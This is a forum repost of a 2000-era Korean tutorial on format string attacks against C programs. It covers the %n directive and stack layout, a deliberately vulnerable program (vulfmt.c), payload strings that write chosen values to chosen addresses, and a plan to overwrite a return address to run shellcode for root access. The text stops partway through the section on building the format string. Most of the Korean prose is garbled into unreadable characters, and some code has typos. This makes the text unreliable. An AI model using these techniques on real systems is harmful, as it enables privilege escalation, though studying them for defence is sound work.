1581, 2/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¼ÒÀ¯
   http://soyu.cafe2.net
   Format String Attack - Concept and General Exploit (by Seo SungHyen)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=214 [º¹»ç]


Format String Attack - Concept and General Exploit (by Seo SungHyen) 06-12 | VIEW : 53

==============================================================================
Title  : Format String Attack - Concept and General Exploit
Author : Seo SungHyen , TrueFinder@IGRUS, khdp.org(ROK)
E-mail : seo@igrus.inha.ac.kr , s1980914@inhavision.inha.ac.kr
Update : 12/28/2000 , 01/03/2001 , 01/08/2001
                                                        - made in korea
==============================================================================

INDEX
        1.¹è°æÁö½Ä
          a. Format StringÀÇ ÀÌÇØ
          b. %n µð·ºÆ¼ºê¶õ ¹«¾ùÀΰ¡.
          c. C Calling Convention
          d. StackÀÇ ±¸Á¶
          e. ELFÀÇ ÀÌÇØ
        
        2.¹®Á¦Á¡
          a. Our problems
          b. Format String Tricking (1)
          c. Format String Tricking (2)
          d. °ø°Ý ½Ã³ª¸®¿À
          
        3.Hand Made Format String Attack
          a. Return Address ã±â
          b. Format String ±¸¼ºÇϱâ
          c. Attacking (1)
          d. Attacking (2)
        
        4.Exploit
          a. Actual Exploit Code (1)
          b. Actual Exploit Code (2)
          c. Actual Exploit Code (3)
          d. Actual Exploit Code (4)




1.¹è°æÁö½Ä

1.a Format StringÀÇ ÀÌÇØ

--------------------------------<example1.c>---------------------------------

char *foo = "4ucking gold broker";
char var = 'A';
int i = 100;

printf("Variables are %s %c %d", foo, var, i );

-----------------------------------------------------------------------------
Á÷°üÀûÀ¸·Î º¸ÀÚ¸é, À§ ¿¹Á¦¿¡¼­ printfÇÔ¼ö¾ÈÀÇ "Variables are %s %c %d" °¡ ¹Ù·Î
Ãâ·ÂÇÏ°íÀÚ ÇÏ´Â µ¥ÀÌÅÍÀÇ format stringÀÌ µÈ´Ù. °£·«ÇÏ°Ô Á¤ÀǸ¦ ÇÏÀÚ¸é, "Ãâ·ÂÇÏ
°íÀÚ ÇÏ´Â µ¥ÀÌÅÍÀÇ formÀ» ±â¼úÇÑ ¹®ÀÚ¿­" Á¤µµ°¡ µÇ°Ú´Ù.


1.b "%n" µð·ºÆ¼ºê¶õ ¹«¾ùÀΰ¡?

-------------------------------<example2.c>----------------------------------

int i;
long j;

printf("how many characters printed %n", &i);
printf("%100000d %n", i &j);

-----------------------------------------------------------------------------
%nµð·ºÆ¼ºê´Â ¹®ÀÚ°¡ Ãâ·ÂµÇ±â ½ÃÀÛÇؼ­ "%n"ÀÌ encountingµÈ ½ÃÁ¡±îÁöÀÇ ½ÇÁ¦
ÇÁ¸°Æ® ÇØ¾ß ÇÒ ¹®ÀÚµéÀÇ °¹¼ö¸¦ ¼¼¾î, ÁÖ¾îÁø º¯¼ö¿¡ ÀúÀåÇÏ´Â ¿ªÇÒÀ» ÇÑ´Ù.
¿©±â¼­´Â "how many characters printed "±îÁö ¼¾´Ù. Áï, º¯¼ö i¿¡´Â Á¤¼ö 27ÀÌ
µé¾î °£´Ù. j¿¡´Â 100000ÀÌ µé¾î °£´Ù.


1.c C Calling Convention

¾î¶² ÇÑ ÇÔ¼ö¿¡¼­ ´Ù¸¥ ÇÔ¼ö¸¦ È£ÃâÇϸç ÆĶó¸ÞÅ͸¦ ³Ñ±â´Â ¹æ¹ýÀº °¢ ¾ð¾î¸¶´Ù
¿©·¯°¡Áö ¹æ¹ýÀÌ Á¸ÀçÇÑ´Ù. º¸Åë C ¾ð¾î¿¡¼­´Â ÇÔ¼öÀÇ Á¦ÀÏ ¸¶Áö¸· ÀÎÀÚ¸¦
ù¹ø°·Î ½ºÅÿ¡ ÀúÀåÇÏ°í ,±×´ÙÀ½ ¼ø¼­´ë·Î °¢ ÁÖ¾îÁø ÀÎÀÚ¸¦ ½ºÅÿ¡ pushÇß´Ù°¡
ÂüÁ¶¸¦ ÇÏ´Â ¹æ½ÄÀ» ¾´´Ù.

-----------------------------<example3.c>-----------------------------------

char *str = "C language";
int i=0;

printf("Hello %s %d", i, str);

----------------------------------------------------------------------------
À̸¦ Å׸é,À§ ¿¹Á¦¿¡¼­ printf()°¡ È£ÃâµÇ¸é¼­ *strÀÌ Á¦ÀÏ ¸ÕÀú stack¿¡ Àü´Þ
ÀÎÀڷνá push°¡ µÇ°í, Á¤¼öÇü iÀÇ °ªÀÌ ±×´ÙÀ½ pushµÇ´Â ½ÄÀÌ´Ù. À§¿Í °°Àº
ÇÁ·Î±×·¥Àº printf°¡ È£ÃâµÇ¸é¼­  ¾Æ·¡¿Í °°Àº ½ºÅà ±¸Á¶¸¦ °¡Áú  °ÍÀÌ´Ù.

HIGH   [  ....]
        [ *str ] <-- string pointer      
        [   i  ] <-- integer value    
        [   *  ] <-- format string pointer
LOW         [  ....]


2.d  StackÀÇ ±¸Á¶

Buffer Overflow¿¡¼­¿Í °°ÀÌ ½ºÅÃÀº Format string attack¿¡¼­µµ ÁÖ °ø°ÝÁöÁ¡ÀÌ´Ù.
ÀÌÀÇ ±¸Á¶¸¦ °£´ÜÈ÷ ¾ð±ÞÇÏ°í ³Ñ¾î°¡ º¸ÀÚ.

------------------------------<example3.c>---------------------------------
function()
{
  char func_buf[64];
  char c;
}
main()
{
  char main_buf[128];
  char a,b;
  int i;

  function();
}
---------------------------------------------------------------------------
ÇÁ·Î±×·¥ÀÌ ½ÃÀ۵Ǹ鼭 ¸ÕÀú main_buf[128]ÀÌ ½ºÅÿ¡ ÀâÈ÷°í, Â÷·¡·Î a,b,i°¡
ÀâÈùÈÄ function()ÀÌ È£Ã⠵Ǹ鼭 ÇöÀç ½ÇÇàÄÚµåÁÖ¼Ò¸¦ pushÇÏ°í(ret addr),
½ºÅà ÇÁ·¡ÀÓ Æ÷ÀÎÅÍ·Î »ç¿ëµÇ´Â ebpÀÇ ¿ø·¡°ªÀ» pushÇÑÈÄ functionÀ» ¼öÇà .
Â÷·Ê·Î func_buf[64]¸¦ Àâ°í, cÀÇ °ø°£À» ½ºÅÿ¡ ÇÒ´çÇÑ´Ù.

¾Æ¸¶µµ À§ ÇÁ·Î±×·¥Àº function½ÇÇàÈÄ ´ÙÀ½°ú °°Àº ½ºÅà ±¸Á¶¸¦ °¡Áú°ÍÀÌ´Ù.
HIGH
        [main_buf ] 128 byte
        [a        ] 1 byte
        [b        ] 1 byte
        [i        ] 4 byte
        [ret      ] 4 byte (return address )
        [saved ebp] 4 byte (sfp )
        [func_buf ] 64 byte
        [c        ] 1 byte
LOW

1.e ELFÀÇ ÀÌÇØ

ÇÁ·Î±×·¥ÀÌ ÀûÀç µÇ¸é¼­ ¾µ¼öÀÖ´Â overwriteµÉ ¼ö ÀÖ´Â ºÎºÐ°ú ±×·¸Áö ¾ÊÀº ºÎºÐÀÌ
ÀÖ´Ù. format stringÀ¸·Î Á¶ÀÛÇÒ ¼ö ÀÖ´Â ºÎºÐÀº ¹Ù·Î overwrtieµÉ¼ö ÀÖ´Â ºÎºÐ»ÓÀÌ´Ù.
À̸¦ Å׸é .bss , .data , .data1 , µîÀÇ stack °°Àº °æ¿ì

´õ ÀÚ¼¼ÇÑ ³»¿ëÀº Remain it here , for our hard study hackers...


2. ¹®Á¦Á¡

2.a. ¹«¾ùÀÌ ¹®Á¦Àΰ¡.

---------------------------<example4.c>-------------------------------------
char *str = "Hello World";
printf("%s",str);

char *str = "Hellow World";
printf(str);

char *str = "%x %x %x %x %x %x";
printf(str);

----------------------------------------------------------------------------
  ÈçÈñ, C¾ð¾î¿¡¼­ ¹®ÀÚ¿­À» Ãâ·ÂÇϱâ À§ÇØ À§ ù¹ø° ¹æ¹ýÀ» »ç¿ëÇÒ °ÍÀ» ¹è¿î´Ù.
ÇÏÁö¸¸, °ÔÀ¸¸¥ ÇÁ·Î±×·¡¸ÓµéÀº À§ µÎ¹ø° ¹æ¹ýÀÌ À¯È¿ÇÔÀ» ¾È´Ù.
¶ÇÇÑ , À§ µÎ °æ¿ì ¶È°°Àº °á°ú¸¦ ³ªÅ¸³½´Ù.

  ÇÏÁö¸¸, ±× ¶È°°Àº °á°ú´Â ¼­·Î ´Ù¸¥ ¿ø¸®¿¡ ÀÇÇØ Ãâ·ÂµÈ °ÍÀÌ´Ù.
ù¹ø° °æ¿ì¿¡ À־ "Hello World"´Â ÇϳªÀÇ ÀÎÀڷνá Àνĵǰí, %sµð·ºÆ¼ºê¿¡
ÀÇÇØ *strÀÌ ÂüÁ¶°¡ µÇ°Ô µÈ´Ù. µÎ¹ø° °æ¿ì´Â *strÀÚü°¡ format stringÀ¸·Î
ÀνĵǾî ÆĽÌÀÌ µÇ¸é¼­ Ãâ·ÂÀÌ µÈ´Ù.

  µû¶ó¼­ ¼¼¹ö° °æ¿ì¿¡ À־ ±× °ÍÀÌ Áõ¸íÀÌ µÈ´Ù. *strÀº ÇϳªÀÇ format string
ÀÌ°í, ÀÌ°ÍÀÌ ÆĽ̵Ǹ鼭 °¢ µð·ºÆ¼ºê¿¡ µû¶ó¼­ Ãâ·ÂÀÇ Çü½ÄÀÌ ¹Ù²î°Ô µÇ´Â °ÍÀÌ´Ù.

  À§ ¼¼¹ø° °æ¿ì¿¡ stack¿¡ ÀÖ´Â °ªµéÀ» Â÷·Ê·Î hexcodeÇüÅ·ΠÃâ·ÂÇÏ°Ô µÈ´Ù.
ÀÌ°ÍÀÌ ¹Ù·Î ¹®Á¦ÀÇ ½Ã¹ßÀÌ µÈ´Ù.


2.b. Format String Tricking (1)

----------------------------< example5.c >----------------------------------
/* normal case */
  int var;
  printf("blah blah %n", &var);


/* tricky case */
  char buf[64];
  fgets(  buf, sizeof(buf) , stdin );
  printf(buf);

----------------------------------------------------------------------------
À§ ù¹ø° °æ¿ì printf´Â ´ÙÀ½°ú °°Àº ¼öÇàÀ» ÇÑ´Ù.
0x80483c8 <main>:       push   %ebp
0x80483c9 <main+1>:     mov    %esp,%ebp
0x80483cb <main+3>:     sub    $0x4,%esp
0x80483ce <main+6>:     lea    0xfffffffc(%ebp),%eax
0x80483d1 <main+9>:     push   %eax
0x80483d2 <main+10>:    push   $0x8048440
0x80483d7 <main+15>:    call   0x8048308 <printf>
0x80483dc <main+20>:    add    $0x8,%esp
0x80483df <main+23>:    leave  
0x80483e0 <main+24>:    ret  

  ÀÏ´Ü var¶õ intÇü º¯¼ö¸¦ ½ºÅà ÇÁ·¡ÀÓ¿¡ Àâ°í, varÀÇ ÁÖ¼Ò &var¸¦
½ºÅÿ¡ ¹Ð¾î ³ÖÀº ´ÙÀ½, "blah blah %n"¶õ Æ÷¸Ë½ºÆ®¸µÀ» ½ºÅÿ¡ pushÇÑ´Ù.
±×ÈÄ¿¡ printf()¸¦ È£ÃâÇؼ­ ±× Æ÷¸Ë½ºÆ®¸µÀ» ±âÁØÀ¸·Î &varÀÇ ÁÖ¼Ò¸¦ ÂüÁ¶,
±× ÁÖ¼Ò¿¡ ÇöÀç Ä«¿îÆ®µÈ Ãâ·Â¹®ÀÚµé(NULL¹®ÀÚ Æ÷ÇÔ)À» ±â·ÏÇÏ°Ô µÈ´Ù.

printf("blah blah %n", &var);
           A        |                 [ ret addr ]
           |        |                 [ saved ebp]
           |        |                 [ var      ]
           |        ----------------->[ &var     ] ( 0xbf?????? )
           ---------------------------[ *fmt str ]


  ±×·³, µÎ¹ø°ÀÇ ¿¹¿¡¼­ Àå³­³¢°¡ ¹ßµ¿ÇÏÁö ¾Ê´Â°¡?
»ç¿ëÀÚ ÀÔ·ÂÀ» ±â´Ù¸®´Â ŸÀÓ¿¡ ´ÙÀ½°ú °°Àº ¹®ÀÚ¿­À» ³Ö¾îº¸ÀÚ.
"\0x10\0x7f\0xff\0xbf%n"
ÇÔ¼ö fget()Àº °í½º¶õÈ÷ À§ ¹®ÀÚ¿­À» buf¿¡ ÀúÀå½Ãų°ÍÀÌ´Ù. ±×¸®°í
¾Æ¹«°Íµµ ¸ð¸£´Â ¸ÛûÀÌ printf()´Â buf¸¦ format stringÀ¸·Î ÀνÄÇØ
ÆĽÌÀ» Çϸç Ãâ·ÂÀ» ½Ãµµ ÇÒ °ÍÀÌ´Ù. ±×·³ ÀÌÇØÀ» µ½±â À§ÇØ bufÀÇ ±¸Á¶¸¦
º¸¸é¼­ ÀÌÇØÇϱâ·Î  ÇÏÀÚ.

printf("\0x10\0x7f\0xff\0xbf%n")
             A                |       [ ret addr ]
             |                |       [ saved ebp]
             |          (c.f.)|       [ buf(63,..]
             |                |       [ ..,..,.. ]
             |                |       [ 4,5,6,7  ] ( %n\0 )
             |                ------->[ 0,1,2,3 )] ( 0xbffff710 )
             -------------------------[*fmt str  ] ( *buf  )


  ¹Ù·Î ¾Õ ù¹ø° ¿¹Á¦¿¡¼­ ¿ì¸®ÀÇ machineÀÌ °á°úÀûÀ¸·Î &var¶ó´Â º¯¼ö¸¦ ÀνÄÇÏ´Â
¹æ¹ýÀº ¹Ù·Î  4byteÀÇ ¾îµå·¹½ºÇüÅ¿´´Ù. (0xbf??????) ±×·³ ¿©±â¼­ buf¿¡ 4byte
¾îµå·¹½ºÇüÀÇ ¹®ÀÚ¿­À»  ³ÖÀ½À¸·Î½á ¿ì¸®´Â ±×°ÍÀ» printf()ÀÇ ¹®ÀÚ¿­ ÆĽÌÁß¿¡
%n µð·ºÆ¼ºê¿¡ ÇØ´çÇϴ  ÀÎÀÚ(ù¹ø° °æ¿ì¿¡¼­´Â &var) ó·³ ¿©±â°Ô ÇÒ ¼öµµ ÀÖÀ»
°ÍÀÌ´Ù.

  Áï, printf()ÀÇ ¹®ÀÚ¿­ ÆĽÌÁß µð·ºÆ¼ºêÀÇ ¹ß°ßÀº ¹Ù·Î *fmt strÀ¸·Î ºÎÅÍ ¹Ù·Î À­
½ºÅðªµéÀÇ ÂüÁ¶°¡ µÇ´Â °ÍÀÌ´Ù. ¿©±â¼­´Â local variableÀÎ buf[0]~buf[3]ÀÌ ¹Ù·Î
intÇü ÂüÁ¶ µð·ºÆ¼ºê %nÀÇ Èñ»ý¾çÀÌ µÇ´Â °ÍÀÌ´Ù. ¾ÆÁÖ Àç¹ÌÀÖ´Ù. ¿ì¸®°¡ printf()¿¡
%n¿¡ ÇØ´çÇÏ´Â ÀÎÀÚ¸¦ ÁÖÁö ¾Ê¾ÒÀ½¿¡µµ ºÒ±¸ÇÏ°í ,printf()´Â ¹Ùº¸Ã³·³ buf[0]~buf[3]
±îÁöÀÇ 4byte¸¦ %n µð·ºÆ¼ºê¿¡ ÇØ´çÇϴ  ÁÖ¼ÒÀÎ ÁÙ·Î Âø°¢ÇÏ¿© ±× ÁÖ¼Ò¿¡ ÀÚ½ÅÀÇ
¹®ÀÚ¿­ Ä«¿îÆ®¸¦ ±â·ÏÇÏ´Â °ÍÀÌ´Ù. ¹°·Ð, ¿©±â¼­´Â ±× °ªÀÌ 4°¡ µÉ °ÍÀÌ´Ù.

ÀÌ·± trickingÀ¸·Î ¿ì¸®´Â ¿ì¸®°¡ ÁöÁ¤ÇØÁØ ¹øÁö¿¡ ¾î¶²(?) °ªÀ» ¾µ¼ö ÀÖ´Ù´Â °ÍÀ»
°á·Ð ÁöÀ»¼ö ÀÖ´Ù.  ÇöÀç±îÁö´Â 4¶ó´Â valueÀÌ´Ù.

  
2.c. Format String Tricking (2)

------------------------------< example6.c >-----------------------------------

  int foo=1;
  long var;
  pritnf("%100000d%n\n", foo, &var );
  
-------------------------------------------------------------------------------
À§ ¿¹Á¦´Â ¹è°æÁö½Ä¿¡¼­ º» °Í°ú ºñ½ÁÇÏ´Ù.  ¸¸¾à ÀÌ·± ½ÄÀ¸·Î È­¸é¿¡ ÇÁ¸°Æ®ÇÑ´Ù¸é
white space x 99999°³¿Í character '1' ÀÌ Ãâ·Â µÈ´Ù. ±×¸®°í ±×°ÍÀ» Ä«¿îÆ®ÇÑ %nÀº
var¿¡ 100000À̶õ °ªÀ» Áý¾î ³Ö´Â´Ù. ÀÌ°ÍÀº ¿ì¸®°¡ ¿ì¸®°¡ ¿øÇÏ´Â °ªÀ» &var¿¡ ³ÖÀ»
¼ö ÀÖÀ½À» ½Ã»çÇÑ´Ù.

<example5.c>ÀÇ
/* tricky case */
  char buf[64];
  fgets(  buf, sizeof(buf) , stdin );
  printf(buf);
ºÎºÐ¿¡¼­ ÀԷ°ªÀ» ¹ÞÀ»¶§ ¾Æ·¡ÀÇ ¹®ÀÚ¿­À» ³ÖÀ¸¸é ¾î¶»°Ô µÉ±î.

"\0x00\0x01\0x00\0x00\0x10\0xf7\0xff\0xbf%1000d%n"

Áö±Ý±îÁö ÀÌÇظ¦ Àß Çß´Ù¸é, printf°¡ °¢ µð·ºÆ¼ºê¿¡´ëÇؼ­ ¾î¶»°Ô ¿òÁ÷ÀÌ°í,
½ºÅÃÀ» ¾î¶»°Ô ÂüÁ¶ÇÏ´ÂÁö Àß ¾Ë°ÍÀÌ´Ù. ±×·¸´Ù. ÀÌ°ÍÀº ¾Æ·¡ ±×¸²Ã³·³ ÂüÁ¶¸¦
Çؼ­ ¿òÁ÷ÀÌ°Ô µÈ´Ù.

"\0x00\0x01\0x00\0x00\0x10\0xf7\0xff\0xbf%1000d%n"
                                            |   |  [ ret addr ]
        ^-------------------------^         |   |  [ saved ebp]
                    |                       |   |  [ buf(63,..]              
                    |                       |   |  [ ..,..,.. ]( %1000d%n\0 )
                    |                       |   -->[ 4,5,6,7  ]( 0xbffff710 )
                    |                       ------>[ 0,1,2,3 )]( 0x00000001 )
                    ------------------------------>[*fmt str  ]( *buf  )



  ¿©±â¼­ °á°ú´Â 0xbffff710À̶ó´Â ÁÖ¼Ò¿¡ 8byte(¹®ÀÚ¿­ °¹¼ö) + 1000 = 1016À»
³Ö´Â °ÍÀÌ µÈ´Ù.

  ÀÚ. ÀÌÁ¦ ¿ì¸®´Â ¿ì¸®°¡ ¿øÇÏ´Â ÁÖ¼Ò¿¡ ¿øÇÏ´Â °ªÀ» ³ÖÀ» ¼ö°¡ ÀÖ°Ô µÇ¾ú´Ù.
Á»´õ ¼¼·ÃµÈ ¹æ¹ýÀ» ¾µ¼ö°¡ Àִµ¥, ±×°ÍÀº Ä«¿îÆÃÇÒ ¹®ÀÚ¸¦ NULL·Î ä¿ì°í ÀÓÀÇÀÇ
¹®ÀÚ¸¦ ½á³Ö´Â ¹æ½ÄÀÌ´Ù. kalou¶ó´Â »ç¶÷ÀÌ ¾´ ¹®¼­¿¡¼­ °í¾ÈÇÑ ¹æ½ÄÀÌ´Ù.
( µÚ¿¡ »ç¿ëÇÏ´Â ¹ýÀ» ¿¹Á¦·Î Á¦½ÃÇÏ°Ú´Ù.)

¾î°µç, °á·ÐÀûÀ¸·Î ¿©±â¼­ Áß¿äÇÑ °ÍÀº ¿ì¸®°¡ ¿øÇÏ´Â ¿µ¿ª¿¡ ¿øÇÏ´Â °ªÀ» Á¤ÇØ
³ÖÀ» ¼ö  ÀÖ´Ù´Â °ÍÀÌ´Ù.


2.d. °ø°Ý ½Ã³ª¸®¿À

¸Õ±æÀ» ÇìÃÄ ¿Ô´Ù. ÇÏÁö¸¸, ¾ÆÁ÷µµ ¿ì¸®¿¡°Õ ÇÒ ÀÏÀÌ ¸¹ÀÌ ³²¾Æ ÀÖ´Ù. ´Ù½Ã Á¤½ÅÀ»
°¡´Ù µë°í, ¿ì¸®°¡ Format StringÀ» °¡Áö°í Tricking Çß´ø Áö½ÄÀ» °¡Áö°í, ÀϹÝÀû
ÀÎ Format String AttackÀÇ ¿ø¸®¸¦ »ìÆì º¸ÀÚ.

TrickingÀÇ °á·Ð :
        ¿ì¸®°¡ ¿øÇÏ´Â °ªÀ» ¿øÇÏ´Â ÁÖ¼Ò¿¡ µ¤¾î ¾µ ¼ö ÀÖ´Ù.

¸¸¾à À§ÀÇ °ÍÀÌ »ç½ÇÀ̶ó¸é, ¿ì¸®´Â ½Ã½ºÅÛ¿¡ ÀÖ¾î »ç¿ëÀÚ ±ÇÇÑ ºÎºÐÀ» °üÁ¦ÇÏ´Â
½Ã½ºÅÛÀÇ º¯¼ö¸¦ °Çµå·Á¼­ ºÒ¹ýÀûÀ¸·Î ¿øÇÏ´Â Priviledge¸¦ ¾òÀ» ¼ö ÀÖÀ» °ÍÀÌ´Ù.
¸¸¾à ÀÏ¹Ý À¯Àú°¡ ÀÚ½ÅÀÇ UID¸¦ 0 ·Î ¹Ù²Û´Ù¸é , ·çÆ®ÀÇ ±ÇÇÑÀ¸·Î ÇÁ·Î±×·¥À» ½ÇÇà
ÇÒ ¼ö ÀÖ´Ù. GUARDENT»çÀÇ Tim NewshamÀ̶õ »ç¶÷Àº ÀÏÂïÀÌ UID¸¦ ¹Ù²Ù´Â °Íµµ °¡´É
Çϸ®¶ó°í ¿¹ÃøÀ» Çߴµ¥, »ó½ÄÀûÀ¸·Î Ä¿³ÎÀÌ °ü¸®ÇÏ´Â u_areaÀÇ Àбâ Àü¿ë º¯¼ö UID
¸¦ °ÇµéÀδٴ °ÍÀº ÇÊÀڷνá´Â Á» ȸÀÇÀûÀÌ´Ù. Á» ´õ ÈǸ¢ÇϽŠºÐÀÌ ÀÌ·¸°Ô ÇÒ ¼ö
ÀÖ´Â ¹æ¹ýÀ» ¾Ë°í ÀÖ´Ù¸é, Á¦°Ô ¸ÞÀÏÀ» ÁÖ¼ÌÀ¸¸é ÇÑ´Ù. :-)

´õ ÀϹÝÀûÀÎ Format String AttackÀÇ °ø°Ý¹ýÀº Buffer Overflow¿Í ºñ½ÁÇÑ °ø°Ý
¾çŸ¦ °®´Â´Ù. ±× ½Ã³ª¸®¿À´Â ´ÙÀ½°ú °°´Ù.

a. Ãë¾à¼º ÇÁ·Î±×·¥ÀÇ return address¸¦ À¯ÃßÇÑ´Ù.
b. ±× ÈÄ ¼¼·ÃµÈ ½©Äڵ带 ½ºÅÿ¡ ¶ç¿ö ³õ´Â´Ù.
b. return address¿Í shellcodeÀÇ ÁÖ¼Ò°¡ Ưº°ÇÑ Å×Å©´ÐÀ¸·Î
    Á¶ÇÕµÈ format stringÀ» ±¸¼ºÇÑ´Ù.
c. Ãë¾àÇÁ·Î±×·¥ÀÇ buffer¿¡ ±× format stringÀ» ³Ö°í °ø°ÝÇÑ´Ù. .
d. ½ÇÆнà ´Ù½Ã ÇÁ·Î±×·¥ÀÇ return address¸¦ À¯ÃßÇÑ´Ù. ±×¸®°í À§¸¦ ´Ù½Ã ¹Ýº¹.


3.Hand Made Format String Attack

¿ì¸®°¡ ¸ÕÀú ÀÌ ÀåÀÇ "3.a Return Address¸¦ ã±â"·Î ³Ñ¾î°¡±â Àü¿¡ ¿ì¸®°¡ ¿¹Á¦·Î½á
¾µ Ãë¾àÇÁ·Î±×·¥ÀÇ Äڵ带 º¸°í ³Ñ¾î °¥ °ÍÀÌ´Ù. ÀÌ ÄÚµå´Â ÇöÀç ¹öÆÛ ¿À¹öÇ÷ο찡
ÀϾÁö ¾Ê°Ô ²û Çϵµ·Ï ÇÏ´Â º¸¾È±Ç°í¿¡ Ãæ½ÇÇÑ ¼Ò½º¶ó°í º¼¼ö ÀÖ°Ú´Ù. ÇÏÁö¸¸,
ÀÌÁ¦ ÀÌ·± ½ÄÀ¸·Î Â¥¿©Áø ÇÁ·Î±×·¥µµ ´õÀÌ»ó ¾ÈÀüÇÒ ¼ö°¡ ¾ø´Ù.

¶ÇÇÑ, ¾Æ·¡ ¼³¸íÇÏ°ÚÁö¸¸  ÆíÀÇ¿¡ ÀÇÇØ ±× ¸®ÅÏ Äڵ带 º¼¼ö ÀÖ°Ô ÀÛ¼º µÇÀÖ´Ù.

--------------------------------< vulfmt.c >-----------------------------------
/*
* vulfmt.c
*/
#include"dumpcode.h"
/* thanks to PLUS (Postech Laboratory for Unix Security) */

unsigned long get_sp()
{
     __asm__("movl %esp,%eax");
}

void func(char **argv)
{
    char buf[128];
    
    snprintf(buf, sizeof(buf), argv[1]);
    buf[sizeof(buf) - 1] = '\0';
    
    printf("%s\n", buf);
    
    /* dump stack */
    dumpcode( (char*)get_sp() , 256 );
}

int main(int argc, char **argv)
{
    if(argc !=2) {
            printf("it needs something argument\n");
            exit(0);
    }
    
    func( argv);
    
    return 0;
}
-------------------------------------------------------------------------------


3.a. Return Address ã±â

  Format String AttackÀÇ Ã¹¹ø° ³­°üÀº ¹Ù·Î ÀÌ ¸®ÅÏ ¾îµå·¹½º¸¦ ã´Â ºÎºÐÀÌ´Ù.
Çö½ÇÀûÀ¸·Î °ø°Ý¿¡ ¾²¿©Áö´Â °ø°Ý ÄÚµåµéÀº ¿À·ÎÁö ¼öÀÛ¾÷¿¡ ÀÇÇÑ °æÇèÀûÀÎ Ãø¸é¿¡
±Ù°ÅÇÏ´Â °ÍÀÌ ´ëºÎºÐÀÌ´Ù. »ç½Ç»ó ¿ì¸®°¡ ±¸ÇÒ ¼öÀÖ´Â exploitÀº ¿À·ÎÁö ±×°ÍÀ» ¸¸µç
ÇØÄ¿ÀÇ ½Ã½ºÅÛ¿¡ ÃÖÀûÈ­ µÇÀÖ´Â °ÍÀÌ ÀϹÝÀûÀÌ´Ù. Ãë¾à ÇÁ·Î±×·¥ÀÇ return address´Â
°ø°Ý ÄÚµåÀÇ ÇÙ½ÉÀÌÁö¸¸, Ç×»ó - ÇØÄ¿°¡ ¸¸µç ½Ã½ºÅÛ¿¡¼­¸¸ Àß µ¹¾Æ°¡´Â, ȤÀº ¿îÀÌ
ÁÁÀ¸¸é ½ÇÇà µÉ ¼ö Àִ  Áï, °ø°Ý hitÀ²ÀÌ ±²ÀåÈ÷ ¶³¾îÁö´Â "¾î¶² °ª"À¸·Î ÁÖ¾îÁ®
ÀÖ´Ù. ¿ì¸®´Â ¿ì¸®ÀÇ Å¸°ÙÀÌ µÇ´Â ÇÑ ÇÁ·Î±×·¥À» °ø°ÝÇϱâ À§Çؼ­ ±× ÇÁ·Î±×·¥ÀÇ
¼Ò½º¸¦ ºÐ¼®ÇÏ°í, ½ÇÁ¦ÀûÀ¸·Î µð¹ö±ëÀ» ÅëÇØ ÀÚ½ÅÀÇ °ø°ÝÀ» È®ÀÎÇØ¾ß ÇÑ´Ù.
(²Ï ºÎ´ã°¡´Â ÀÛ¾÷ÀÌ´Ù.) ±×·¯³ª ÇÁ·Î±×·¥¿¡ ±²ÀåÈ÷ ¼÷·ÃµÇ°Å³ª, ½Ã½ºÅÛ¿¡ ´ëÇÑ
ÀÌÇØ°¡ dzºÎÇÑ»ç¶÷À̶ó¸é ±×·¯ÇÑ exploit Çϳª Âë ¸¸µå´Â °ÍÀº º°ÀÏÀÌ ¾Æ´Ï¸®¶ó
»ý°¢µÈ´Ù.

¾Æ¹«Æ°, ¿©±â¼­´Â ¿ì¸® hard study hakersÀÇ ÀÌÇظ¦ µ½±âÀ§ÇØ Ãë¾à ÇÁ·Î±×·¥ÀÇ
Return Address¸¦ ³»ºñÃá »óÅ¿¡¼­ °ø°ÝÀ» ½ÃµµÇÒ °ÍÀÌ´Ù. ½ÇÁ¦ Ãë¾àÇÁ·Î±×·¥ÀÇ
Return Address¸¦ ã´Â ÀÏÀº »ç¶ûÇÏ´Â ¿ì¸® ÆóÀεé(hard study hackers)¿¡°Ô
¸Ã±â°Ú´Ù.

Good Luck !~
;-}


3.b. Format String ±¸¼ºÇϱâ

  ÀÌ°ÍÀº ÀÏ´Ü ¿ì¸®ÀÇ ¸ñÀûÇÏ´Â ½©Äڵ尡 ÇöÀç ¿ì¸®ÀÇ ½ÇÇེÅÿ¡ ¶° ÀÖÀ¸¸ç, ¼³·É
±×·¸Áö ¾Ê´Ù ÇÏ´õ¶óµµ ÇÁ·Î±×·¥ÀÇ ¼öÇà°ú µ¿½Ã¿¡ ±×°ÍÀÌ ¿ì¸®°¡ ¾Ë¼ö ÀÖ´Â ¾î´À
À§Ä¡¿¡ ÀÚ¸®Àâ°í ÀÖ´Ù´Â °ÍÀ» °¡Á¤ÇØ¾ß ÇÑ´Ù. ¶ÇÇÑ, ±×·¡¼­ ±×°ÍÀ» °¡¸£Å°´Â
°¡»óÁÖ¼Ò°¡ ¿ì¸® °ø°Ý ÇÁ·Î±×·¥ÀÇ offsetÀÎÀÚ·Î Á¶Á¤µÇ¾îÁú ¼ö ÀÖ´Ù´Â °ÍÀ» ¼÷ÁöÇؾß
ÇÏ°Ú´Ù.

À̸¦Å׸é, ¿ì¸®´Â ¿ì¸®ÀÇ shellcode°¡ ÀÖ´Â, ½ÇÇàµÉ °¡»óÁÖ¼Ò¸¦ ÀÌ¹Ì ¾Ë°í ÀÖ¾î¾ß ÇÑ´Ù.
±×·¡¾ß ±×°ÍÀ» °¡Áö°í, Format String À» ±¸¼ºÇÒ¼ö°¡ Àֱ⠶§¹®ÀÌ´Ù.
µ¶ÀÚÀÇÀÌÇظ¦ µ½±â À§ÇØ Á» ½¬¿î ¹æ¹ýºÎÅÍ ÁøÇàÇØ º¸µµ·Ï ÇÏ°Ú´Ù.

  
  ¿ì¸®°¡ ¿øÇÏ´Â shellcodeÀÇ Ã¹¹ø° ÁÖ¼ÒÀ§Ä¡°¡ 0xbffff7a0¶ó°í ÇÏÀÚ.
±×¸®°í, ÃßÃøµÇ°Å³ª ȤÀº ¼Ò½º¸¦ ÅëÇØ ¿¹»óµÇ´Â (¿ì¸®ÀÇ °æ¿ì´Â º¸¿©Áø´Ù.)
Ãë¾à ÇÁ·Î±×·¥ÀÇ return address°¡ 0xbffff980 ÁöÁ¡À̶ó°í ÇÏÀÚ.
±×·¯¸é, ¿ì¼± À̵ΠÁÖ¼Ò¸¦ °ø°Ý¿ë format stringÀ¸·Î ¸¸µé±â À§Çؼ­ ¾ÆÁÖ cuteÇÑ °è»êÀÌ
